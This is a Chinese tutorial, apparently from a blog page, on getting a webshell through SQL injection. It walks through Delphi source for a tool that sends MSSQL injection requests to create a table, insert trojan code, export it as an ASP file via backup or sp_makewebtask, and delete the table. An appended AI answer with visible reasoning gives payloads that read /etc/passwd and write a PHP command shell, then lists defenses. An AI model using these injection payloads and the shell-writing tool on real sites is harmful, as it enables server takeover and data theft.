SQL注入得到WEBSHELL

一.通过SQL注入得到WEBSHELL的原理:
N.E.V.E.R的方法:利用数据库备份得到WEBSHELL。创建一个表,在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来,最后再删除新建的表。
分析: N.E.V.E.R利用了MSSQL的备份数据库功能。把数据导出来,设想数据库中有<%%>之类的ASP标实符,导出文件,文件名以.ASP的形式保存。然后文件又保存在WEB的路径下。那么这个导出的ASP文件是不是要去解释<%%> 之内的语句呢?如果数据库中有的表中有<%%>标实符,并且这之中有错误,那么我们导出来生成的ASP文件也会有误。不过,这种机会也不太大。
再来看看CZY的方法吧。
CZY的方法:前面的和N.E.V.E.R的方法基本上差不多。只是后面用到了扩展存储过程——sp_makewebtask。这个扩展存储过程的作用就是:可以把MSSQL数据库中的某个表中的记录导出来,以文件的方法保存起来。这种方法就不会出现什么问题原因在于:我们只去读表中的某个字段中的值。把字段的信息导出来生成文件。这个字段中的值都是我们刚加上的。自己在加入数据的时候,先调试一下,没有问题在加入进去,导出来就当然没有问题了。
以上两位的方法,我都手工测试过。利用SQL注入漏洞,建表,向表中加数据,然后再导出数据,再删除表。都是利用的SQL语句。这里我就不多说了,大家可以看本期的文章。
二.利用DELPHI去实现功能的前言
原理都分析过了。我们怎么利用DELPHI来实现他们的手工操作呢?其实方法是非常简单的。DELPHI提供了一个NMHTTP控件。我们利用这个控件就可以向某个特定的URL提交参数。然后实现我们的自动注射功能。我马上要为大家讲解的这个程序,有一个特点。也可以说成是一个缺陷吧。程序不去自动猜解WEB的绝对路径。程序不去判断当前连接SQL数据库的当前账号的权限。我为什么要这么做?因为得到这两者用SQL注入是非常难得到的。所以,我们程序发送命令就不会考虑太多。成不成功你执行完自己去看看生成没有就OK了。

三.如何利用DELPHI得到WEBSHELL。
程序中用到的值。我们这里来看看有哪些:URL路径,远程WEB绝对路径(通过其他方法得到,你一定有办法的) 采用什么方法去得到WEBSHELL(也就是两位的方法,你选哪一种)。我们同时要求点击一个按纽开始执行命令,和点击一个按纽来终止命今。最后就是新建的表的名称,以及表的字段名称,再次就是字段的类型。前面的我们在程序中放上输入,选择之类的控件就行了。后面的我们设一个选项按纽点按纽弹出相应设置。再把这些相应的设置用一个RECORD来保存。
首先,我们在DIT控件。名称分别是:UrlET //URL路径的输入框、ShellPathET //远程木马的位置、CustomBdoorET//自定义木马的位置。再放两个RadioButton用来选择采用什么方式获取WEBSHELL。CAPTION分别取名为: BackUP DataBase 和 WEB作业。然后再放三个SpeedButtion按纽。名称分别是:设置,开始,停止, 最后再放一个MEMO控件。来显示当前添加的信息。到此界面上的工作就做完了。界面如图:



现在来写程序了。
我们首先定义一个RECORD。
如下:
Type
SetOption = Record
TableName : String; //用来保存要创建的表名.
FieldName : String; //用来保存要创建的字段名.
FiledType : String; //用来保存创建的字段名类型.
End;
FiledType字段类型的值是以下类型的一种:
Bigint binary bit char datetime decimal float image int money nchar ntext numeric nvarchar real smalldatetime smallint
Smallmoney sql_variant text timestamp tinyint uniqueidentifier varbinary varchar 这些都是MSSQL字段类型值.
再定义一个全局变量:
Var
ISStop : Boolean; //用来判断用户是否按下了停止按纽.
好了。在表单创建的过程中,我们为RECORD记录输入默认值.
代码如下:
procedure TMainForm.FormCreate(Sender: TObject);
begin
sOption.TableName :='cyfd'
sOption.FieldName :='gmemo'
sOption.FiledType :='text'
end;
现在我们添加开始执行命令的代码。
先定义BDoorList 为TstringList。主要目的就是把木马的内容加进来.
创建两个变量来保存urlET.和ShellPathET的值.方便程序简化调用.
在程序开始执行前,我们得先检查一下用户的输入
定义一个Checkinput函数.
如下:
Function CheckInput : Boolean;
Begin
Result := False;
if Trim(urlet.Text) = '' then
Begin
Application.MessageBox('请输入URL地址!','提示',mb_ok+mb_iconinformation);
Exit;
End;
if Trim(ShellPathET.Text) = '' then
Begin
Application.MessageBox('请输入文件保存地址!','提示',mb_ok+mb_iconinformation);
Exit;
End;
IF DefBDoor.Checked then
Begin
if Not FileExists(extractfilepath(Application.ExeName)+'默认木马.txt') then
Begin
Application.MessageBox('没有找到 [默认木马.txt] 文件!','提示',mb_ok+mb_iconinformation);
Exit;
End;
End
Else
if Not FileExists(CustomBdoorET.Text) then
Begin
Application.MessageBox('没有找到所选的木马文件!','提示',mb_ok+mb_iconinformation);
Exit;
End;
Result := True;
End;
在最开始加入:
IF Not CheckInput then Exit; //如果输入不合法就退出过程.
好了,如果用户输入没什么错,我们就来下面的代码。
首先我们把IsStop设为假。创建BdoorList。
BDoorList := TstringList.Create;
再加木马内容到BDoorlist.
BDoorList.LoadFromFile(CustomBdoorET.text);
好了,在这里我还要给大家说一下:用NMHTTP提交数据的时候.要把输入的一些特别符号转达成编码。我们这里要把空格和%符号替换成相应的编码分别是:%20和%25,不然.程序加不进数据。
代码如下:
BDoorList.Text:=StringReplace(BDoorList.Text,'%','%25',[rfReplaceAll]);
BDoorList.Text:=StringReplace(BDoorList.Text,' ','%20',[rfReplaceAll]);
接下来.我们就提交建表的功能了.
Memo.Lines.Add('建表...');
Memo.Lines.Add(''); NMHttp.Get(Url+'CREATE%20TABLE%20[dbo].['+sOption.TableName+']%20(['+sOption.FieldName+']%20['+sOption.FiledType+']);');
这样我们就创建了一个表。然后.我们向表中加记录:
代码如下:
Memo.Lines.Add('加数据...');
Memo.Lines.Add('');
For i:=0 to BDoorList.Count-1 do //这里用一个循环把木马的内容加进表中去.
Begin
IF IsStop then //这里如果点了停止按纽程序将终止任务.
Begin
BDoorList.Free;
Exit;
End; NMhttp.Get(Url+'Insert%20into%20'+sOption.TableName+'%20('+sOption.FieldName+')%20values%20('''+BDoorList.Strings+''');');
Memo.Lines.Add('Add Line '+Inttostr(i+1));
End;
现在就是导出数据生成木马了.
Memo.Lines.Add('导出数据...');
Memo.Lines.Add('');
IF BKData.Checked then //如果选中采用备份数据就执行下面的命令.
NMhttp.Get(Url+'declare%20@a%20sysname;select%20@a=db_name();backup%20database%20@a%20to%20disk='''+ShellPath+'''')
Else //如果是用WEB作业的形式. NMhttp.Get(Url+'EXECUTE%20sp_makewebtask%20@outputfile='''+ShellPath+''',@query='''+'select%20'+sOption.FieldName+'%20from%20'+sOption.TableName+'''');
我们再删除刚建的表。NMHttp.Get(Url+'drop%20TABLE%20[dbo].['+sOption.TableName+'];');
这样我们的任务就完成了。下面来释放变量.
BDoorList.Free;
再来向停止按纽中添加点击事件:
一行代码就行了:IsStop := True;
到这里主表单的内容基本上完成了。现在我们来看设置表单中怎么来设置.其实非常简单.主表单中已经定义了一个RECORD.我们只需要将用户输入的新值,再次赋给RECORD就行了。
设置表单中先引用主表单.然后在界面中添加二个EDIT控件:
第一个名称为:TableNameET //保用户输入的存临时表
第二个名称为:FieldNameET //用来保存用户输入的字段名.
再添加一个Combobox //用来保存用户所选的字段类型值.
名称:FieldTypeCombox
OK.界面如下:

代码如下:
定义一个过程,主表单好调用这个设置。
Procedure ShowSet;
Begin
Application.CreateForm(TSetForm,SetForm);
With SetForm do
Begin
TableNameET.Text := sOption.TableName;
FieldNameET.Text := sOption.FieldName;
FieldTypeCombox.ItemIndex := FieldTypeCombox.Items.IndexOf(sOption.FiledType);
End;
SetForm.ShowModal;
SetForm.Free;
End;
在主表单中设置的点击事件中添加上showset过程就行了。
下面就是点击确定的代码了。
IF CheckInput then
Begin
sOption.TableName := Trim(TableNameET.Text); //把用户的输入赋给RECORD.
sOption.FieldName := Trim(FieldNameET.Text);
sOption.FiledType := FieldTypeCombox.Text;
Close;
End;
这里又有一个CheckInput主要就是检查用户输入的值是不是合法。
代码如下:
Function CheckInput : Boolean;
Begin
Result := False;
IF Trim(TableNameET.Text)='' then
Begin
Application.MessageBox('请输入临时表名!','提示',mb_ok+mb_iconinformation);
Exit;
End;
IF Trim(FieldNameET.Text)='' then
Begin
Application.MessageBox('请输入字段名!','提示',mb_ok+mb_iconinformation);
Exit;
End;
Result := True;
End;
到这里程序就完了。
<think>好的,我现在需要详细思考用户关于通过SQL注入获取WebShell的方法及防御措施的问题。首先,我得回顾一下SQL注入的基本原理,然后结合相关引用内容来整理具体的攻击步骤和防御策略。 用户提到想了解如何通过SQL注入获取WebShell,可能是为了学习防御方法或研究安全问题。因此,我需要确保回答既涵盖攻击方法,又详细说明防御措施,并且引用的资料要准确。根据用户提供的三个引用,引用[1]提到了通过中间件如Tomcat获取WebShell的方法,引用[2]涉及发现SQL注入点,引用[3]则提供了使用sqlmap进行爆表的示例。这些内容可以帮助构建攻击步骤部分。 首先,SQL注入获取WebShell的一般方法可能包括以下几个步骤:寻找注入点、提升权限、写入WebShell、访问WebShell。需要详细说明每个步骤的具体操作,比如如何判断注入点是否存在,如何利用写入文件的权限,常见的写入函数如SELECT INTO OUTFILE等。同时,结合引用中的例子,比如使用load_file函数读取文件,或者通过sqlmap进行自动化注入。 接下来,需要提到具体的利用条件,比如secure_file_priv的设置,目录的写入权限,以及Web路径的可访问性。这些条件是否满足直接影响到攻击是否成功。例如,在MySQL中,如果secure_file_priv设置为空,才能写入文件到指定目录,否则会受到限制。 然后,关于中间件拿WebShell的方法,引用[1]提到Tomcat获取WebShell的方法,可能涉及到上传恶意war包或者利用管理界面漏洞。这部分可能需要进一步展开,但用户的问题主要围绕SQL注入,所以可能需要简要提及中间件方法作为补充,但重点还是SQL注入途径。 防御措施方面,需要从输入验证、权限控制、安全配置、错误处理等方面入手。比如使用参数化查询来防止注入,限制数据库用户的权限,禁用敏感函数,配置服务器防止文件写入等。同时,定期更新系统和中间件,使用WAF等工具也是有效的防御手段。 需要确保回答的结构清晰,分点说明攻击方法和防御措施,并在适当的地方加入引用标记。例如,在提到使用load_file函数时,引用[1]中的例子,而在讨论sqlmap的使用时,引用[3]的示例。 可能遇到的问题包括如何准确区分不同数据库系统的写入方法,比如MySQL的INTO OUTFILE和SQL Server的差异。此外,确保防御措施全面,涵盖开发层面和运维层面的策略。 最后,生成的相关问题需要与主题紧密相关,比如如何检测SQL注入漏洞,如何加固数据库权限,以及WebShell的检测方法等。这些问题可以帮助用户进一步深入学习相关安全知识。 总结一下,回答的结构应该是: 1. SQL注入获取WebShell的方法,分步骤说明,并引用相关例子。 2. 防御措施,分点详细说明。 3. 相关问题,引导用户深入探讨。 需要确保使用正确的中文表达,行内公式用$...$,独立公式用$$...$$,但在这个问题中可能涉及较少数学公式,更多是代码和步骤说明。代码部分需要用代码块格式,例如展示SQL语句或配置文件。 现在需要检查是否有遗漏的防御措施,或者攻击方法中的关键步骤。同时,确保引用的正确性,每个引用标记对应正确的引用内容。例如,引用[1]主要关于WebShell获取方法,包括中间件和CMS,引用[2]关于实战演练中的注入点发现,引用[3]关于sqlmap的具体使用。 可能还需要提到日志管理和监控,作为防御措施的一部分,但用户提供的引用中没有涉及这点,所以可能不在此次回答的重点范围内。 最终,回答需要平衡攻击方法和防御措施,既满足用户了解攻击手段的需求,又提供足够的防御建议,帮助用户提升系统安全性。</think>### 通过SQL注入获取WebShell的方法及防御措施 #### 一、SQL注入获取WebShell的典型方法 1. **发现SQL注入点** 通过输入参数测试(如单引号`'`、逻辑语句`1=1`)判断是否存在注入漏洞。例如: ```sql http://example.com/news.php?id=1' AND 1=1 --+ ``` 若页面返回正常,说明存在注入可能性[^2]。 2. **获取数据库权限与路径** - 利用`LOAD_FILE()`函数读取服务器文件(需`secure_file_priv`配置允许): ```sql UNION SELECT LOAD_FILE('/etc/passwd'), NULL --+ ``` 引用示例:`select load_file('c://windows//system32//inetsrv//MetaBase.xml')`[^1]。 - 通过数据库函数(如MySQL的`@@datadir`)获取Web根目录路径。 3. **写入WebShell** 若具备文件写入权限,使用`INTO OUTFILE`或`DUMPFILE`写入恶意脚本: ```sql UNION SELECT "<?php system($_GET['cmd']); ?>", NULL INTO OUTFILE '/var/www/html/shell.php' --+ ``` 成功写入后,通过访问`http://example.com/shell.php?cmd=id`可执行系统命令[^3]。 4. **中间件漏洞辅助利用** 例如Tomcat可通过上传恶意WAR包获取WebShell(需管理界面弱口令或权限漏洞)。 --- #### 二、关键利用条件 1. 数据库用户需具备`FILE`权限(MySQL中默认禁用)。 2. 服务器配置`secure_file_priv`为空或允许目标目录写入。 3. 已知Web应用绝对路径(可通过报错信息或数据库配置获取)。 --- #### 三、防御措施 1. **输入过滤与参数化查询** - 使用预编译语句(如PHP的PDO、Java的PreparedStatement)避免拼接SQL。 - 过滤特殊字符(如`'`、`"`、`;`)和敏感函数关键词(如`UNION`、`LOAD_FILE`)。 2. **最小化数据库权限** - 限制数据库账户权限,禁止赋予`FILE`或`SUPER`权限。 - 示例配置: ```sql GRANT SELECT, INSERT ON app_db.* TO 'web_user'@'localhost'; ``` 3. **服务器安全配置** - 设置`secure_file_priv`为限制目录(MySQL配置文件): ```ini [mysqld] secure_file_priv = /tmp ``` - 禁用危险函数(通过`disable_functions`配置PHP的`system`、`exec`)。 4. **文件系统监控** - 限制Web目录写入权限(如`chmod 755 /var/www/html`)。 - 使用入侵检测系统(IDS)监控异常文件创建行为。 5. **定期漏洞扫描** - 使用工具(如sqlmap、Nessus)检测注入漏洞[^3]。 - 更新中间件和CMS补丁(如Tomcat、WordPress)。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值